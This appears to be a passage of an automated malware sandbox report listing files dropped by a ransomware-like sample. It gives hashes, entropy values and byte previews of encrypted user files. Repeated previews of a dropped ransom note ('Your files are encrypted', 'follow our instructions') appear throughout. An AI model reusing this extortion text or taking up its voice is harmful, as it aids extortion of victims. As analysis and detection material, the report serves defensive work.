          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Preview: -.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u.r. .s.y.s.t.e.m. .h.a.s. .e.x.t.e.n.s.i.o.n. .s.u.8.4.m.u.3.3.c.1.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.
          C:\Users\user\Documents\GIGIYTFFYT\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Preview: -.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u.r. .s.y.s.t.e.m. .h.a.s. .e.x.t.e.n.s.i.o.n. .s.u.8.4.m.u.3.3.c.1.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.
          C:\Users\user\Documents\GRXZDKKVDB.mp3
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.810467526366943
          Encrypted:false
          SSDEEP:24:gNKFKpCQ1Pa95EwI7Xhwhep/kfzg/pfUyqbMvAfU04d0XADn+zib:gNLIywsXK7zKhgCAx4Ku+2
          MD5:A24EB03ECF86A351E7CC677F41B27BD7
          SHA1:6B9A759BE75D441C3832EBE2E8C8677ED3572751
          SHA-256:5754048222547EF3456373900C7C55E8A02A495D9121915F39A527021716C540
          SHA-512:CEC6ECF2C63B409AE7BE2165D114C14054C64D882101222D21876272E445F2DBDFA6F46149D8ED7949B87A7B2E069B8AF288F37BAF355AC94C15635C2B1F38A7
          Malicious:false
          Preview: .F>#.x.GOL).N...6.Gt..>.k.....(f.z%.....?.m:0n....9hZP[.N....-r.).......`.....k....p..)...Y......F..2].}.X.^...q.U#..lb...WI..9...W.?...[&.Y...N.%.....V...r.:.8..?.IhB.i.%M.....Dg.|........2.w.f.]n?.A.......lg%B.S-F.......j!zv..1..Jb|......e.-..0..y.H'.BY..g.aG..O.t...M...._.u..]:.....p..oqD.Y{az0/.5....Uij....O..._.A..\...E .........a...j}.r.......5R2.y.W.X..........:.....;..w)..VA...Ei._.O'*.6..O.lF.r..L.-).F.. .....]2......6.......g.....6)....S..%.;k..."....w.l.J.R..M.......E.....l..y....h+.L...M....4.`q.6.~->"._9....a............0..u....?\..h.I....W....;&..P..O 8.*..."..p.\au...:.*...T<.Q.Q-7...<..\.).%2.f../1...2t....8..,$..`....-.J.....@.#...#.... .s..../#..|.y.;.....N~J.J....$.G.n..g.....f..h.......Dm..)U..]....H.(...(.f7.(........i...x..3..Y..R...N2..U..-.+J.T.0.:..#&Hi.y.....3%O.D.+.".}.V_.w.p.x3?....2....b..T._./..|.@..?,-..@<S.q..B....Rj|F]1rZ.#X.].{..L.................YEl:c3...).%V..hg..Y...2.I...L..5..(#*..>....G......~...OH.`...
          C:\Users\user\Documents\GRXZDKKVDB\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Preview: -.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u.r. .s.y.s.t.e.m. .h.a.s. .e.x.t.e.n.s.i.o.n. .s.u.8.4.m.u.3.3.c.1.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.
          C:\Users\user\Documents\IPKGELNTQY.pdf
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.857462494691937
          Encrypted:false
          SSDEEP:24:mijEDpntjmOt+PvQgdpp+KmEOCXZSoQGFbqRCc4jFIDEXADn+zF:mTtj3t+nQOmEhdJ+Dku+B
          MD5:F4AC99DE8D2DBD88D9EBCD8DC7193BB4
          SHA1:6A49EDE625523A65C350C4B41DCC35C5A507207D
          SHA-256:AADBB3A7627106B2ABB052B252031BF4005ED2456A623054406938A62D888520
          SHA-512:22D910B09A75478AC2A0A6E34E75E35677943F4066F3D444BD05531E2EDF46C0ECF94BD3C109E73377F2CBA2E6046825F090C9008C331EBC10B8DC3E9D1CF330
          Malicious:false
          Preview: ...u..8.n..X...K......!...z.D.U.,...H.A..3Fs.._.=o1u....R.M....e._.3T).t.....WH...hO...H......h....I.y.^\..^.G.xo........T.....I.0.M.......t......... ..JQ...0B.[,@ .p.r...h?m..j...Y..U..=.S..S...6.>..3...S.d.....)W..@g;.>.!.)..D...H].........<3.}..l.tq..Z.*. O..S.3.Ao..VD.4WR......3`.T..|..?..l#......a..6h!..:.;.P4P.FX..:....eY..hFW...p....6):.{.K......D..e.)....[1.%%.L"7.G..>.\..q.HIO!BR...q..I@D5y.x;.N./...&..2.>......cwd...q.y0...8..uG..^m.d.i.'4...e.'.....&=1...Z..X..5"'.....dN.7@.n....0.j...2.d..A.D.n+-+r.....Q..&.;.w..*.>...=F.\.&......`......<.i0BM9.M.KV.|m.J........o...P......h&....h.8j...[......a.|.x.p...]......cd..EC1.x}..95M...q... ..y..1..|4........v...3x...../H..8y..U...._.)3...#K*..&."0.......yO....Fz.......R......l....$G......y.U.%.......8..E.^.....g<....U...J.Dd.k.U...mn/)wL...W..]..5K4........^..H..#.z/...|....e.p...9."7.....Jb.N......y...s:p...w..W.._A..]&....~......%....CT..6R.C..31.$..!.#H.0.^+.a.>.vg.QJ!.K..5......r.
          C:\Users\user\Documents\MXPXCVPDVN\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Preview: -.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u.r. .s.y.s.t.e.m. .h.a.s. .e.x.t.e.n.s.i.o.n. .s.u.8.4.m.u.3.3.c.1.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.
          C:\Users\user\Documents\NEBFQQYWPS.png
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.860656422681623
          Encrypted:false
          SSDEEP:24:xXQgNZOQJBmH2UfYZ46TH5ri2ovgSWeFKbHM4sX0x8ihRn38V60MBXADn+zCaO:RDNIPLYOOH42Qg8FKbHMNK8ihRSMFu+6
          MD5:059B2D3EABC50A958EA0CC17ECBAE4A2
          SHA1:4B1DEB8BA9C937B86BF53BBD623453860BAD1AE3
          SHA-256:E10E286C57C61840B8E493997C06D1392BF39C3DF9E72001AC40370C6E7913B0
          SHA-512:A8A8AB27C6DB0D0900B2EA603B193A8C8F85C0E1915E8C3DB1CD71F89B2793BEF636BB13F5A90C01E7CE4CE818EE9FDB7A55FF2A5972549F80921495FA7B0923
          Malicious:false
          Preview: /z......j...K<5P.Z..O.T...d.61{.F...\%...j.Z.@........<.0..$w\.G....V.w`.Z......./2.....&...[...A...V.....3\m.2.P.X ....w..sR@..( ...TJ-.....(.....J.;..j....$.$4FUyU#.......,..D...Y.....b..@,.......^M......|...>*....p.h#..X.... v...*.nn.....e..3.P?$~Z...jZ...X.|..J".6.^.."Uz....'...a.f.G._!..aO?.A ..%^p......."....;.xUO...B`.:.......w...d....Q.....9.0...j.;..[.........3Xw...?....5E..i8f......a.#P..k...P...._j.1...8K..R........[#6...2..K.3...\9(/.(..fKr\$b.WO..l....pR..P.m.Y..)...B.o....I....ye....w.Qu...3.k.....>.i.........o1..7.......a[.{..x.G9.......jj.<x.....#R...F8..H....c....m..Cu$A.....q..j.|.H..6ak..Y.ts....yKv.......j...x.... ./.......r......]...^........"..b'.c.1..q..i`y......siU#Q.g.....xRY.}..'.!....&...H........2d=.:.'.....[...G..tx.l_ODd..q........q...v..Hy..[..Wa...<...c......=.A.._7.g.B...D..7....:!..MW......LomB......:7.!R..t......@.??..N.Px49z..+Yk......{.4S.l.3....?F.N..DM.Z>8..*.7......I....,.b;.@....!.w.....I...R.=...
          C:\Users\user\Documents\PIVFAGEAAV.mp3
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.854666274388066
          Encrypted:false
          SSDEEP:24:QaZJVbgD/32HE5dxfMpBxDHG0n9OwlE7WXxu+aL8na+QCTAFRzpxrJjvXADn+z1Z:PZJV8/sIEDxD3M4JKL8n4Csbp3u+r
          MD5:E4F0767D18BEA7862163E8E028D3E8D4
          SHA1:A5F3FE349244B191E46AE0FD76FF32B01DB3D240
          SHA-256:78EC44D60EA3CF1365C5F8EC6BC8739D30C7DD28FF1BB1B844B87116B2FA64C4
          SHA-512:4AEE5A0557C0BDCBEB9459C39533E86AD0FF21788957AB7E1670C53E31759DE302AB64FF9753B72E75E4BAAB8E5C9DC1768BF3F33B2C8DD886E387511FCF5426
          Malicious:false
          Preview: ..l..PJSx.7..q<.)....$|...$.x..)...)....e'.K.`.RJ..+H.p...8.Hf;......T.j.......... ..D7....O....#.+`.d.*..:9..^.c`...].x.....E.....18....<d*...rQ/E...M+/cE.....1m4.M.m....4..F[.`...X..<(X.A...!....xU..4J....y..(.".:.B.D.$....'......J\.oAU"s.t!.v.u...FCa[;.....LN7{x"...g3q9cj..@.|..D.....gV...sA./WR4.Q.s8..t...R....N..k.,..1L...\..K.{.>.....~...u....7.Vo.~W.....8.-.?.~....8...'].&.......m....iqXY(......7.D...1.#.MF.&\6Ik..Z..).d......K.$$......Hx..AB.n:.......^Lv.!.....j&...9.......p.._[\h.k.ew.&L.e.w..J.o...Y?z.....R..`......C+.N.....8R...b....p,..p.!..N..M.%....b.!rU.}o.m..Q(...^. ..n.+."...(...s.S...N@....&|..d.ss..%......}.....]..k3...3.........X4."k...o..we^.....LM....S.y.....k".!...y.....a~.|...r.X..a.j.....5.#z./n.....O..u.y.....P..r....`.@a.D*.zq*..cv...<V1|......I.....@...=d..qX...!^..R...o.;.q...a.)<........h..T.{."...xT..(.6)>w..W.=U<[...(....b..a.D.A...-.^.t....SR.7..*...z.$.......o}.c....=5.~...C.H..V:.....Y.c..Y.nA.Q..b.N.h
          C:\Users\user\Documents\PWCCAWLGRE.jpg
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.853947184755314
          Encrypted:false
          SSDEEP:24:oZlU6SLQhue0bFmDX+j+zM1cjowTpnsxiDXEYNhodHXADn+zJnEZk:oZlU6SkhueY0DOiAi1PoJu+NEZk
          MD5:EB914CA499A8BFFCCF003738A90E24BA
          SHA1:9D1A6FFE41142F8ABD5D80D39E044C7048ED2908
          SHA-256:26E87698FA9D8312BC523CDAD4222ED31C8D53E541443B645E97301A8D781ED6
          SHA-512:5A2F453AA5C1226F73E3C193BA704CEFD507ABF69C6480FC3F91CF7DC35A9BA7DDE40BBD543ECA5617C306AAF6E7EDFD9BF666A821AB8EC994E517742669DAE1
          Malicious:false
          Preview: w>..wR..y...#.V-...U..gB.e..;>..<.....`......<.?.S.S.....O.h./'l.c..R..!".R...-n.."...X...b..p....z..(.tM..x.....L.J..Z.S:..N...B5.d......f7Q...s9....:EC.4... Kx..v.!0Q....!..H......3,....9r..G....;._N....\V.-.g.C...&8f..n..@.......N..\g..9.J.x..}...,A..R7.H.h'\..._...<.......(.p.].!.D....'.?0f...z}....-..|i...E_..'{.3..f%g..q+D.......Y..u...*.n....z~m.........":..[C...`w.{.U,b..+.q.9dP..y.Ra7..W....Fo......7..jD.:...Y...Q.F..)Ua.8V#.#F<JJ.......w...U.;..-.#.k.....5.'.5~..bx.dVj...t.d.X..*^.<.V....X..;.UJ..........+.....li)..)uMj.]M.......!k..e"4..;/.(..B.m.*$._.. {z.\.Y...[.w.(.b./.-.....i..&.....1ya.\.kv.5..'R..f..cw.(.'%....u...6.=.....Z.P.a....}..C...iT..."......^...Ru...2../.v...O........yS4[...(....u..!)..)l..G....W.=..t..>..0.#.8.).X..q.......C..C.5.R.."..m.a..3..:...a...UT....H...&.....6.......0.LtI..k.CiB....,.)4.,2"........t.1.F....A..[.<.nw/.?...4....n...mF/.r....R.d..!.aL....Ru..?$...:E.w.-.24b~.....&7........e|.q.....x
          C:\Users\user\Documents\PWCCAWLGRE\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Preview: -.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u.r. .s.y.s.t.e.m. .h.a.s. .e.x.t.e.n.s.i.o.n. .s.u.8.4.m.u.3.3.c.1.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.
          C:\Users\user\Documents\QCFWYSKMHA.png
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.839552641643961
          Encrypted:false
          SSDEEP:24:/L1f1tF3wo2QQcV6IhtDvDHtl6Qdgu/u6TBCxodj7X9IwlqR3nbXADn+zSM3:/L1fp3pHzVrrtl61IdBXCvRju+mM3
          MD5:A81EE22FE8BFBF1A4E94625E0FE68910
          SHA1:26DAA1A9C4F463E9E6D32187FBCD97BFF11E9328
          SHA-256:E138D1E52694E2EC3EDFFF42045A3585AE21D4E6D662FC9C301F3FAB761B7F45
          SHA-512:205DF6F132E61497C90BFCC9FEBC371D1DD312E54523AD9B94ED6A4451E83A5829E1CBC9D460F6BA64FFEAA43CD9951D0F7406D6FA2EDE31525527D721B429B9
          Malicious:false
          Preview: ...1|..j.T..,hq..x&...VRb.....~.W...I...HSK...W.[\H...j..9..#/.1...1...q_....H..q...q..O..>P....V..a.D./..........r...lZg....~.oX..G...].L.&.$." .!..S.`.\.....9.../.3&.6N.. {,9I.l..'k..T.GM..G..[OO.D.a\7..W..TA...+....Y.....*u.y.P8r..87)$.G.E....7.....p..>.].L.............P+...W.f..$..$G...D..R5...7....N..RF.T.X..~....R .......[...I.....{..c.'.......<A..\........_UA...CP%........4....@......2..+`_.},@..".h.......i.......~.2...w2......n.V..V..&....(&8.&.wO....r.G ux..Gx9nz..`.i.{....dO..);z.....Z..k.._.U.W......|#.w.Ye.o..yHz..U...E....^.0t......:....0V.o3......:.0%).3D.VCP..}.wi.@1m....N..N.7.D.L.ys2].I.&ov.s.]........~...k.`....@..M... bM.|.N.Qdh.2...P....Is.....\O...0...N..z.!....u.......t%..&....^o...3.~....0H..0..V.'.d...;...G.....E..D.z."....N.Q.p....,9jP:..|t..x.1{... z..............Y....z..,....|.W!\F...y..Vh.O....Q.\...q.>...k...NS....J...`..+.@..7.`.....(.6.A.........@..y.X......"B..f..v...D....R......N.A.^p;'@..?.J...._S..
          C:\Users\user\Documents\QNCYCDFIJJ\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Preview: -.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u.r. .s.y.s.t.e.m. .h.a.s. .e.x.t.e.n.s.i.o.n. .s.u.8.4.m.u.3.3.c.1.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.
          C:\Users\user\Documents\SFPUSAFIOL.jpg
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.843248130658393
          Encrypted:false
          SSDEEP:24:gC9wqFEViAs8sNylRbnbT3GZpWvZWD7OD1FflryM6K+KjU7TXADn+z7pEi:gM9qV6RAr2ZpWRWD7ORFdryM27u++i
          MD5:CBBE8B48787F880E7856C86A6FD8CB45
          SHA1:88A455C1FAB8B0921EF685F6E1B54B0AB8269EE0
          SHA-256:BA283207AA11355C7E726F5588639ED3126229852B393B650D35D85724642342
          SHA-512:3FF2D0E0787AE6111137C9788C4B9F2262D5A5153C3EAB5A98783F1C558879CEB5466E9730B5A5EA74073CF648301094A04D89F8B41C1D36FC5B0BA2DC4B0F88
          Malicious:false
          Preview: .wi...n._.4.<.)...V...~..;..P....HN`.>..j@...............c:\v~.><..X..........^0+y....j.[..[.#uN...6..d...Y...X..e#4i...F\.)/.....d.y...*..Y.S..oOW&.*....O9...F.T..F4........K..R...8....p...T..l].<.k....a.h..L$.u.u&.b.3P...Rp#*.....X.5......J..J...Qh..4..l.-.Q.2.-.n...p..A..x`.D.1..5}oU2...H%..n.kF3..9.._...1..o=.f9..#...U.t.>B8...6vd7q..Q..N+.1.'.:K...iV.yNeT0B.ax...N.@.O...Ld...N......v.Q.\_...y...c.C...Z2...3I8........e. ....i.~..="...:taWs....B..k*.)+l.;...(.3wL*$.i.....J....O...`..I... KL...Da{x.e.M.B*.....z.......Im...W...\..AY.,1....5.......dF.*$f,+..u ...!Sm......(!...b...BP..A...z.a.6..\....vS!dgI..@.......7....5....R)[...t...:......].8.....e .......f....}.$..B.d.`.X.....d....[F....... .......cM.ZY....%..].....0r.<.^....X.XLI9.....[}..0..f.&.p.FvN..g=.t...>_.............6o...K..Z.\.5.3..0.s4>Cp$...P j.....4.u.[{..d.5".(.3.Ix.....N...f.H*q..;b.....,.Dxu...././."....)......c...[.....`........A.[.=F4....UW..|y..vx?`..v...m...
          C:\Users\user\Documents\SFPUSAFIOL.xlsx
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
